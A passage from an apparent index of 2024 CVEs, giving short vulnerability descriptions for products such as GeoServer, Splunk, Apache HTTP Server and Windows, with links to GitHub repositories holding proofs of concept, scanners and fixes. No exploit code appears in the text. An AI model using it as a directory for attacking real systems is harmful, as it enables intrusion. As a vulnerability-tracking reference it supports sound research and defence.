- [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469)

### CVE-2024-35475 (-)

A Cross-Site Request Forgery (CSRF) vulnerability was discovered in OpenKM Community Edition on or before version 6.3.12. The vulnerability exists in /admin/DatabaseQuery, which allows an attacker to manipulate a victim with administrative privileges to execute arbitrary SQL commands.

- [carsonchan12345/CVE-2024-35475](https://github.com/carsonchan12345/CVE-2024-35475)

### CVE-2024-35511 (-)

phpgurukul Men Salon Management System v2.0 is vulnerable to SQL Injection via the "username" parameter of /msms/admin/index.php.

- [efekaanakkar/CVE-2024-35511](https://github.com/efekaanakkar/CVE-2024-35511)

### CVE-2024-35538 (2024-08-19)

Typecho v1.3.0 was discovered to contain a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses by specifying an arbitrary IP as the value of the X-Forwarded-For or Client-Ip headers while performing HTTP requests.

- [cyberaz0r/Typecho-Multiple-Vulnerabilities](https://github.com/cyberaz0r/Typecho-Multiple-Vulnerabilities)

### CVE-2024-35584
- [whwhwh96/CVE-2024-35584](https://github.com/whwhwh96/CVE-2024-35584)

### CVE-2024-36079 (-)

An issue was discovered in Vaultize 21.07.27. When uploading files, there is no check that the filename parameter is correct. As a result, a temporary file will be created outside the specified directory when the file is downloaded. To exploit this, an authenticated user would upload a file with an incorrect file name, and then download it.

- [DxRvs/vaultize_CVE-2024-36079](https://github.com/DxRvs/vaultize_CVE-2024-36079)

### CVE-2024-36104 (2024-06-04)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14.

Users are recommended to upgrade to version 18.12.14, which fixes the issue.

- [ggfzx/CVE-2024-36104](https://github.com/ggfzx/CVE-2024-36104)

### CVE-2024-36401 (2024-07-01)

GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.

The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well, which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.

Versions 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.

- [bigb0x/CVE-2024-36401](https://github.com/bigb0x/CVE-2024-36401)
- [Niuwoo/CVE-2024-36401](https://github.com/Niuwoo/CVE-2024-36401)
- [RevoltSecurities/CVE-2024-36401](https://github.com/RevoltSecurities/CVE-2024-36401)
- [Mr-xn/CVE-2024-36401](https://github.com/Mr-xn/CVE-2024-36401)
- [zgimszhd61/CVE-2024-36401](https://github.com/zgimszhd61/CVE-2024-36401)
- [jakabakos/CVE-2024-36401-GeoServer-RCE](https://github.com/jakabakos/CVE-2024-36401-GeoServer-RCE)
- [ahisec/geoserver-](https://github.com/ahisec/geoserver-)
- [Chocapikk/CVE-2024-36401](https://github.com/Chocapikk/CVE-2024-36401)
- [yisas93/CVE-2024-36401-PoC](https://github.com/yisas93/CVE-2024-36401-PoC)
- [justin-p/geoexplorer](https://github.com/justin-p/geoexplorer)
- [daniellowrie/CVE-2024-36401-PoC](https://github.com/daniellowrie/CVE-2024-36401-PoC)
- [PunitTailor55/GeoServer-CVE-2024-36401](https://github.com/PunitTailor55/GeoServer-CVE-2024-36401)
- [netuseradministrator/CVE-2024-36401](https://github.com/netuseradministrator/CVE-2024-36401)
- [kkhackz0013/CVE-2024-36401](https://github.com/kkhackz0013/CVE-2024-36401)

### CVE-2024-36416 (2024-06-10)

SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.

- [kva55/CVE-2024-36416](https://github.com/kva55/CVE-2024-36416)

### CVE-2024-36424 (2024-08-06)

K7RKScan.sys in K7 Ultimate Security before 17.0.2019 allows local users to cause a denial of service (BSOD) because of a NULL pointer dereference.

- [secunnix/CVE-2024-36424](https://github.com/secunnix/CVE-2024-36424)

### CVE-2024-36527 (2024-06-17)

puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.

- [bigb0x/CVE-2024-36527](https://github.com/bigb0x/CVE-2024-36527)

### CVE-2024-36539 (2024-07-24)

Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.

- [Abdurahmon3236/CVE-2024-36539](https://github.com/Abdurahmon3236/CVE-2024-36539)

### CVE-2024-36821 (2024-06-11)

Insecure permissions in Linksys Velop WiFi 5 (WHW01v1) 1.1.13.202617 allows attackers to escalate privileges from Guest to root.

- [IvanGlinkin/CVE-2024-36821](https://github.com/IvanGlinkin/CVE-2024-36821)

### CVE-2024-36837 (2024-06-05)

SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.

- [phtcloud-dev/CVE-2024-36837](https://github.com/phtcloud-dev/CVE-2024-36837)
- [lhc321-source/CVE-2024-36837](https://github.com/lhc321-source/CVE-2024-36837)

### CVE-2024-36842
- [abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-](https://github.com/abbiy/CVE-2024-36842-Backdooring-Oncord-Android-Sterio-)

### CVE-2024-36877 (2024-08-12)

Micro-Star International Z-series motherboards (Z590, Z490, and Z790) and B-series motherboards (B760, B560, B660, and B460) with firmware 7D25v14, 7D25v17 to 7D25v19, and 7D25v1A to 7D25v1H were discovered to contain a write-what-where condition in the SW handler for SMI 0xE3. Motherboards with the following chipsets are affected: Intel 300, Intel 400, Intel 500, Intel 600, Intel 700, AMD 300, AMD 400, AMD 500, AMD 600 and AMD 700.

- [jjensn/CVE-2024-36877](https://github.com/jjensn/CVE-2024-36877)
- [CERTologists/POC-CVE-2024-36877](https://github.com/CERTologists/POC-CVE-2024-36877)

### CVE-2024-36991 (2024-07-01)

In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.

- [bigb0x/CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991)
- [Mr-xn/CVE-2024-36991](https://github.com/Mr-xn/CVE-2024-36991)
- [th3gokul/CVE-2024-36991](https://github.com/th3gokul/CVE-2024-36991)
- [sardine-web/CVE-2024-36991](https://github.com/sardine-web/CVE-2024-36991)
- [Cappricio-Securities/CVE-2024-36991](https://github.com/Cappricio-Securities/CVE-2024-36991)

### CVE-2024-37032 (2024-05-31)

Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.

- [Bi0x/CVE-2024-37032](https://github.com/Bi0x/CVE-2024-37032)
- [ahboon/CVE-2024-37032-scanner](https://github.com/ahboon/CVE-2024-37032-scanner)

### CVE-2024-37051 (2024-06-10)

GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4

- [LeadroyaL/CVE-2024-37051-EXP](https://github.com/LeadroyaL/CVE-2024-37051-EXP)
- [mrblackstar26/CVE-2024-37051](https://github.com/mrblackstar26/CVE-2024-37051)

### CVE-2024-37081 (2024-06-18)

The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.

- [mbadanoiu/CVE-2024-37081](https://github.com/mbadanoiu/CVE-2024-37081)
- [Mr-r00t11/CVE-2024-37081](https://github.com/Mr-r00t11/CVE-2024-37081)
- [CERTologists/-CVE-2024-37081-POC](https://github.com/CERTologists/-CVE-2024-37081-POC)
- [CERTologists/Modified-CVE-2024-37081-POC](https://github.com/CERTologists/Modified-CVE-2024-37081-POC)

### CVE-2024-37084 (2024-07-25)

In Spring Cloud Data Flow versions prior to 2.11.4, a malicious user who has access to the Skipper server API can use a crafted upload request to write an arbitrary file to any location on the file system, which could lead to compromising the server.

- [Kayiyan/CVE-2024-37084-Poc](https://github.com/Kayiyan/CVE-2024-37084-Poc)
- [vuhz/CVE-2024-37084](https://github.com/vuhz/CVE-2024-37084)
- [Ly4j/CVE-2024-37084-Exp](https://github.com/Ly4j/CVE-2024-37084-Exp)
- [A0be/CVE-2024-37084-Exp](https://github.com/A0be/CVE-2024-37084-Exp)

### CVE-2024-37085 (2024-06-25)

VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.

- [mahmutaymahmutay/CVE-2024-37085](https://github.com/mahmutaymahmutay/CVE-2024-37085)
- [Florian-Hoth/CVE-2024-37085-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-37085-RCE-POC)
- [WTN-arny/Vmware-ESXI](https://github.com/WTN-arny/Vmware-ESXI)
- [WTN-arny/CVE-2024-37085](https://github.com/WTN-arny/CVE-2024-37085)

### CVE-2024-37147 (2024-07-10)

GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. An authenticated user can attach a document to any item, even if the user has no write access on it. Upgrade to 10.0.16.

- [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC)

### CVE-2024-37383 (2024-06-07)

Roundcube Webmail before 1.5.7 and 1.6.x before 1.6.7 allows XSS via SVG animate attributes.

- [bartfroklage/CVE-2024-37383-POC](https://github.com/bartfroklage/CVE-2024-37383-POC)

### CVE-2024-37393 (2024-06-10)

Multiple LDAP injection vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.

- [optistream/securenvoy-cve-2024-37393](https://github.com/optistream/securenvoy-cve-2024-37393)

### CVE-2024-37713
- [fullbbadda1208/CVE-2024-37713](https://github.com/fullbbadda1208/CVE-2024-37713)

### CVE-2024-37726 (2024-07-03)

Insecure Permissions vulnerability in Micro-Star International Co., Ltd MSI Center v.2.0.36.0 allows a local attacker to escalate privileges via the Export System Info function in MSI.CentralServer.exe

- [carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation)
- [NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation)

### CVE-2024-37742 (2024-06-25)

Insecure Access Control in Safe Exam Browser (SEB) <= 3.5.0 on Windows. The vulnerability allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity. By exploiting this flaw, an attacker can bypass exam controls and gain an unfair advantage during exams.

- [Eteblue/CVE-2024-37742](https://github.com/Eteblue/CVE-2024-37742)

### CVE-2024-37759 (2024-06-24)

DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface.

- [crumbledwall/CVE-2024-37759_PoC](https://github.com/crumbledwall/CVE-2024-37759_PoC)

### CVE-2024-37762 (2024-07-01)

MachForm up to version 21 is affected by an authenticated unrestricted file upload which leads to remote code execution.

- [Atreb92/cve-2024-37762](https://github.com/Atreb92/cve-2024-37762)

### CVE-2024-37763 (2024-07-01)

MachForm up to version 19 is affected by an unauthenticated stored cross-site scripting which affects users with valid sessions who can view compiled form results.

- [Atreb92/cve-2024-37763](https://github.com/Atreb92/cve-2024-37763)

### CVE-2024-37764 (2024-07-01)

MachForm up to version 19 is affected by an authenticated stored cross-site scripting.

- [Atreb92/cve-2024-37764](https://github.com/Atreb92/cve-2024-37764)

### CVE-2024-37765 (2024-07-01)

Machform up to version 19 is affected by an authenticated Blind SQL injection in the user account settings page.

- [Atreb92/cve-2024-37765](https://github.com/Atreb92/cve-2024-37765)

### CVE-2024-37770 (2024-07-10)

14Finger v1.1 was discovered to contain a remote command execution (RCE) vulnerability in the fingerprint function. This vulnerability allows attackers to execute arbitrary commands via a crafted payload.

- [k3ppf0r/CVE-2024-37770](https://github.com/k3ppf0r/CVE-2024-37770)

### CVE-2024-37791 (2024-06-18)

DuxCMS3 v3.1.3 was discovered to contain a SQL injection vulnerability via the keyword parameter at /article/Content/index?class_id.

- [czheisenberg/CVE-2024-37791](https://github.com/czheisenberg/CVE-2024-37791)

### CVE-2024-37843 (2024-06-25)

Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.

- [gsmith257-cyber/CVE-2024-37843-POC](https://github.com/gsmith257-cyber/CVE-2024-37843-POC)

### CVE-2024-37888 (2024-06-14)

The Open Link is a CKEditor plugin, extending the context menu with the possibility to open a link in a new tab. The vulnerability allowed JavaScript code to be executed by abusing the link href attribute. It affects all users using the Open Link plugin at version < **1.0.5**.

- [7Ragnarok7/CVE-2024-37888](https://github.com/7Ragnarok7/CVE-2024-37888)

### CVE-2024-37889 (2024-06-14)

MyFinances is a web application for managing finances. MyFinances has a way to access other customer invoices while signed in as a user. This method allows an actor to access PII and financial information from another account. The vulnerability is fixed in 0.4.6.

- [uname-s/CVE-2024-37889](https://github.com/uname-s/CVE-2024-37889)

### CVE-2024-38036
- [hnytgl/CVE-2024-38036](https://github.com/hnytgl/CVE-2024-38036)

### CVE-2024-38041 (2024-07-09)

Windows Kernel Information Disclosure Vulnerability

- [varwara/CVE-2024-38041](https://github.com/varwara/CVE-2024-38041)

### CVE-2024-38063 (2024-08-13)

Windows TCP/IP Remote Code Execution Vulnerability

- [diegoalbuquerque/CVE-2024-38063](https://github.com/diegoalbuquerque/CVE-2024-38063)
- [noradlb1/CVE-2024-38063-VB](https://github.com/noradlb1/CVE-2024-38063-VB)
- [Sachinart/CVE-2024-38063-poc](https://github.com/Sachinart/CVE-2024-38063-poc)
- [p33d/cve-2024-38063](https://github.com/p33d/cve-2024-38063)
- [dweger-scripts/CVE-2024-38063-Remediation](https://github.com/dweger-scripts/CVE-2024-38063-Remediation)
- [almogopp/Disable-IPv6-CVE-2024-38063-Fix](https://github.com/almogopp/Disable-IPv6-CVE-2024-38063-Fix)
- [Th3Tr1ckst3r/CVE-2024-38063](https://github.com/Th3Tr1ckst3r/CVE-2024-38063)
- [haroonawanofficial/CVE-2024-38063-Research-Tool](https://github.com/haroonawanofficial/CVE-2024-38063-Research-Tool)
- [ynwarcs/CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063)
- [patchpoint/CVE-2024-38063](https://github.com/patchpoint/CVE-2024-38063)
- [PumpkinBridge/Windows-CVE-2024-38063](https://github.com/PumpkinBridge/Windows-CVE-2024-38063)
- [zenzue/CVE-2024-38063-POC](https://github.com/zenzue/CVE-2024-38063-POC)
- [AdminPentester/CVE-2024-38063-](https://github.com/AdminPentester/CVE-2024-38063-)
- [ThemeHackers/CVE-2024-38063](https://github.com/ThemeHackers/CVE-2024-38063)
- [KernelKraze/CVE-2024-38063_PoC](https://github.com/KernelKraze/CVE-2024-38063_PoC)
- [ps-interactive/cve-2024-38063](https://github.com/ps-interactive/cve-2024-38063)
- [Brownpanda29/Cve-2024-38063](https://github.com/Brownpanda29/Cve-2024-38063)
- [FrancescoDiSalesGithub/quick-fix-cve-2024-38063](https://github.com/FrancescoDiSalesGithub/quick-fix-cve-2024-38063)
- [Faizan-Khanx/CVE-2024-38063](https://github.com/Faizan-Khanx/CVE-2024-38063)
- [ArenaldyP/CVE-2024-38063-Medium](https://github.com/ArenaldyP/CVE-2024-38063-Medium)
- [lnx-dvlpr/cve-2024-38063](https://github.com/lnx-dvlpr/cve-2024-38063)
- [becrevex/CVE-2024-38063](https://github.com/becrevex/CVE-2024-38063)
- [idkwastaken/CVE-2024-38063](https://github.com/idkwastaken/CVE-2024-38063)
- [thanawee321/CVE-2024-38063](https://github.com/thanawee321/CVE-2024-38063)

### CVE-2024-38077 (2024-07-09)

Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability

- [SecStarBot/CVE-2024-38077-POC](https://github.com/SecStarBot/CVE-2024-38077-POC)
- [qi4L/CVE-2024-38077](https://github.com/qi4L/CVE-2024-38077)
- [Sec-Link/CVE-2024-38077](https://github.com/Sec-Link/CVE-2024-38077)
- [murphysecurity/RDL-detect](https://github.com/murphysecurity/RDL-detect)
- [Wlibang/CVE-2024-38077](https://github.com/Wlibang/CVE-2024-38077)
- [psl-b/CVE-2024-38077-check](https://github.com/psl-b/CVE-2024-38077-check)
- [zhuxi1965/CVE-2024-38077-RDLCheck](https://github.com/zhuxi1965/CVE-2024-38077-RDLCheck)
- [lworld0x00/CVE-2024-38077-notes](https://github.com/lworld0x00/CVE-2024-38077-notes)
- [atlassion/CVE-2024-38077-check](https://github.com/atlassion/CVE-2024-38077-check)
- [BBD-YZZ/fyne-gui](https://github.com/BBD-YZZ/fyne-gui)
- [Destiny0991/check_38077](https://github.com/Destiny0991/check_38077)
- [mrmtwoj/CVE-2024-38077](https://github.com/mrmtwoj/CVE-2024-38077)

### CVE-2024-38080 (2024-07-09)

Windows Hyper-V Elevation of Privilege Vulnerability

- [pwndorei/CVE-2024-38080](https://github.com/pwndorei/CVE-2024-38080)

### CVE-2024-38100 (2024-07-09)

Windows File Explorer Elevation of Privilege Vulnerability

- [Florian-Hoth/CVE-2024-38100-RCE-POC](https://github.com/Florian-Hoth/CVE-2024-38100-RCE-POC)

### CVE-2024-38124
- [tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468](https://github.com/tadash10/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468)

### CVE-2024-38127 (2024-08-13)

Windows Hyper-V Elevation of Privilege Vulnerability

- [pwndorei/CVE-2024-38127](https://github.com/pwndorei/CVE-2024-38127)

### CVE-2024-38144 (2024-08-13)

Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability

- [Dor00tkit/CVE-2024-38144](https://github.com/Dor00tkit/CVE-2024-38144)

### CVE-2024-38178 (2024-08-13)

Scripting Engine Memory Corruption Vulnerability

- [uixss/PoC-CVE-2024-38178](https://github.com/uixss/PoC-CVE-2024-38178)

### CVE-2024-38189 (2024-08-13)

Microsoft Project Remote Code Execution Vulnerability

- [vx7z/CVE-2024-38189](https://github.com/vx7z/CVE-2024-38189)

### CVE-2024-38200 (2024-08-08)

Microsoft Office Spoofing Vulnerability

- [passtheticket/CVE-2024-38200](https://github.com/passtheticket/CVE-2024-38200)

### CVE-2024-38366 (2024-07-01)

trunk.cocoapods.org is the authentication server for the CocoaPods dependency manager. The part of trunk which verifies whether a user has a real email address on signup used an rfc-822 library which executes a shell command to validate the validity of the email domain's MX records. It works via a DNS MX lookup. This lookup could be manipulated to also execute a command on the trunk server, effectively giving root access to the server and the infrastructure. This issue was patched server-side with commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3 in September 2023. This RCE triggered a full user-session reset, as an attacker could have used this method to write to any Podspec in trunk.

- [ReeFSpeK/CocoaPods-RCE_CVE-2024-38366](https://github.com/ReeFSpeK/CocoaPods-RCE_CVE-2024-38366)

### CVE-2024-38396 (2024-06-16)

An issue was discovered in iTerm2 3.5.x before 3.5.2. Unfiltered use of an escape sequence to report a window title, in combination with the built-in tmux integration feature (enabled by default), allows an attacker to inject arbitrary code into the terminal, a different vulnerability than CVE-2024-38395.

- [vin01/poc-cve-2024-38396](https://github.com/vin01/poc-cve-2024-38396)

### CVE-2024-38472 (2024-07-01)

SSRF in Apache HTTP Server on Windows allows to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content.

Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note: Existing configurations that access UNC paths will have to configure the new directive "UNCList" to allow access during request processing.

- [Abdurahmon3236/CVE-2024-38472](https://github.com/Abdurahmon3236/CVE-2024-38472)
- [mrmtwoj/apache-vulnerability-testing](https://github.com/mrmtwoj/apache-vulnerability-testing)

### CVE-2024-38473 (2024-07-01)

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.

Users are recommended to upgrade to version 2.4.60, which fixes this issue.

- [Abdurahmon3236/CVE-2024-38473](https://github.com/Abdurahmon3236/CVE-2024-38473)
- [juanschallibaum/CVE-2024-38473-Nuclei-Template](https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template)

### CVE-2024-38475 (2024-07-01)

Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.

Substitutions in server context that use backreferences or variables as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.

- [p0in7s/CVE-2024-38475](https://github.com/p0in7s/CVE-2024-38475)

### CVE-2024-38526 (2024-06-25)

pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.

- [putget/pollypull](https://github.com/putget/pollypull)

### CVE-2024-38537 (2024-07-02)

Fides is an open-source privacy engineering platform. `fides.js`, a client-side script used to interact with the consent management features of Fides, used the `polyfill.io` domain in a very limited edge case, when it detected a legacy browser such as IE11 that did not support the fetch standard. Therefore it was possible for users of legacy, pre-2017 browsers who navigate to a page serving `fides.js` to download and execute malicious scripts from the `polyfill.io` domain when the domain was compromised and serving malware. No exploitation of `fides.js` via `polyfill.io` has been identified as of time of publication.

The vulnerability has been patched in Fides version `2.39.1`. Users are advised to upgrade to this version or later to secure their systems against this threat. On Thursday, June 27, 2024, Cloudflare and Namecheap intervened at a domain level to ensure `polyfill.io` and its subdomains could not resolve to the compromised service, rendering this vulnerability unexploitable. Prior to the domain level intervention, there were no server-side workarounds and the confidentiality, integrity, and availability impacts of this vulnerability were high. Clients could ensure they were not affected by using a modern browser that supported the fetch standard.

- [Havoc10-sw/Detect_polyfill_CVE-2024-38537-](https://github.com/Havoc10-sw/Detect_polyfill_CVE-2024-38537-)

### CVE-2024-38793 (2024-08-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection. This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1.

- [ret2desync/CVE-2024-38793-PoC](https://github.com/ret2desync/CVE-2024-38793-PoC)

### CVE-2024-38812
- [groshi/CVE-2024-38812-POC-5-Hands-Private](https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private)

### CVE-2024-38816 (2024-09-13)

Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.

Specifically, an application is vulnerable when both of the following are true:

- the web application uses RouterFunctions to serve static resources
- resource handling is explicitly configured with a FileSystemResource location

However, malicious requests are blocked and rejected when any of the following is true:

- the Spring Security HTTP Firewall (https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html) is in use
- the application runs on Tomcat or Jetty

- [startsw1th/cve-2024-38816-demo](https://github.com/startsw1th/cve-2024-38816-demo)
- [WULINPIN/CVE-2024-38816-PoC](https://github.com/WULINPIN/CVE-2024-38816-PoC)
- [Galaxy-system/cve-2024-38816](https://github.com/Galaxy-system/cve-2024-38816)

### CVE-2024-38821
- [mouadk/cve-2024-38821](https://github.com/mouadk/cve-2024-38821)

### CVE-2024-38856 (2024-08-05)

Incorrect Authorization vulnerability in Apache OFBiz.

This issue affects Apache OFBiz: through 18.12.14.

Users are recommended to upgrade to version 18.12.15, which fixes the issue.

Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).

- [securelayer7/CVE-2024-38856_Scanner](https://github.com/securelayer7/CVE-2024-38856_Scanner)
- [ThatNotEasy/CVE-2024-38856](https://github.com/ThatNotEasy/CVE-2024-38856)
- [Praison001/CVE-2024-38856-ApacheOfBiz](https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz)
- [0x20c/CVE-2024-38856-EXP](https://github.com/0x20c/CVE-2024-38856-EXP)
- [emanueldosreis/CVE-2024-38856](https://github.com/emanueldosreis/CVE-2024-38856)
- [BBD-YZZ/CVE-2024-38856-RCE](https://github.com/BBD-YZZ/CVE-2024-38856-RCE)

### CVE-2024-39031 (2024-07-09)

In Silverpeas Core <= 6.3.5, in Mes Agendas, a user can create new events and add them to their calendar. Additionally, users can invite others from the same domain, including administrators, to these events. A standard user can inject an XSS payload into the "Titre" and "Description" fields when creating an event and then add the administrator or any user to the event. When the invited user (victim) views their own profile, the payload will be executed on their side, even if they do not click on the event.

- [toneemarqus/CVE-2024-39031](https://github.com/toneemarqus/CVE-2024-39031)

### CVE-2024-39069 (2024-07-09)

An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack.

- [AungSoePaing/CVE-2024-39069](https://github.com/AungSoePaing/CVE-2024-39069)

### CVE-2024-39081
- [Amirasaiyad/BLE-TPMS](https://github.com/Amirasaiyad/BLE-TPMS)

### CVE-2024-39203 (2024-07-08)

A cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

- [5r1an/CVE-2024-39203](https://github.com/5r1an/CVE-2024-39203)

### CVE-2024-39205
- [Marven11/CVE-2024-39205-Pyload-RCE](https://github.com/Marven11/CVE-2024-39205-Pyload-RCE)

### CVE-2024-39210 (2024-07-05)

Best House Rental Management System v1.0 was discovered to contain an arbitrary file read vulnerability via the Page parameter at index.php. This vulnerability allows attackers to read arbitrary PHP files and access other sensitive information within the application.

- [KRookieSec/CVE-2024-39210](https://github.com/KRookieSec/CVE-2024-39210)

### CVE-2024-39211 (2024-07-04)

Kaiten 57.128.8 allows remote attackers to enumerate user accounts via a crafted POST request, because a login response contains a user_email field only if the user account exists.

- [artemy-ccrsky/CVE-2024-39211](https://github.com/artemy-ccrsky/CVE-2024-39211)

### CVE-2024-39248 (2024-07-03)

A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field at /admin.php.

- [jasonthename/CVE-2024-39248](https://github.com/jasonthename/CVE-2024-39248)

### CVE-2024-39250 (2024-07-22)

EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.

- [efrann/CVE-2024-39250](https://github.com/efrann/CVE-2024-39250)

### CVE-2024-39304 (2024-07-26)

ChurchCRM is an open-source church management system. Versions of the application prior to 5.9.2 are vulnerable to an authenticated SQL injection due to improper sanitization of user input. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements directly into the database query due to inadequate sanitization of the EID parameter in a GET request to `/GetText.php`. Version 5.9.2 patches the issue.

- [apena-ba/CVE-2024-39304](https://github.com/apena-ba/CVE-2024-39304)

### CVE-2024-39306
- [apena-ba/CVE-2024-39306](https://github.com/apena-ba/CVE-2024-39306)

### CVE-2024-39614 (2024-07-10)

An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings containing specific characters.

- [Abdurahmon3236/-CVE-2024-39614](https://github.com/Abdurahmon3236/-CVE-2024-39614)

### CVE-2024-39689 (2024-07-05)

